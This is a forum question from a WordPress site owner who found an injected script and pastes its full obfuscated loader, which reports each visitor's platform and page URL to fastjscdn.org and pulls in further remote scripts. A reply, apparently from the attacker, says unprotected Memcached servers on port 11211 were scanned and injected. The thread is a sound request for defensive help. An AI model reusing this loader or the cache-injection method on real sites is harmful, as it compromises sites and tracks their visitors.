In my WordPress site, i have this malicious code before "/body":
<script src="https://fastjscdn.org/static.js?hash=a633f506a53746a846742c5655ebf596"></script>
The file static.js contains this:
window.__google__ads__show||(window.__google__ads__show="1",function(){if(function t(){try{return window.self!==window.top}catch(a){return!0}}()){var t,a,e=window.parent.document.createElement("script");e.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(e);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{}),t="https://fastjscdn.org/"+window.location.hostname.replace("www.","")+"/static.js",(a=document.createElement("script")).src=t,document.head.appendChild(a)}());
Before "fastjscdn .org", the maliciuos JS code was hosting on domanin name "asmr9999 .live". Since few days, the domain has changed in "fastjscdn .org".
How is it possible? How can it change the domain where is it hosted?
I am sure that WordPress, themes and plugins do not contain the malicious code. I didn’t find anything in the database, also in base64 encode, for now.
Also, What does the code in the JS file do to my site?
I also found other people with my same malware, in a custom CMS, we can not solve the problem in any way. More info here
2
Answers
It maybe late,but let me tell the truth.The problem is the Memcached server you are using which is public and no password in network.I made a script scanning the network and injecting this malicious code to every memcached server.It’s a "cache-side" xss attack.Your server is safe.Configure your firewall and block connection from outside to port 11211,everything will ok.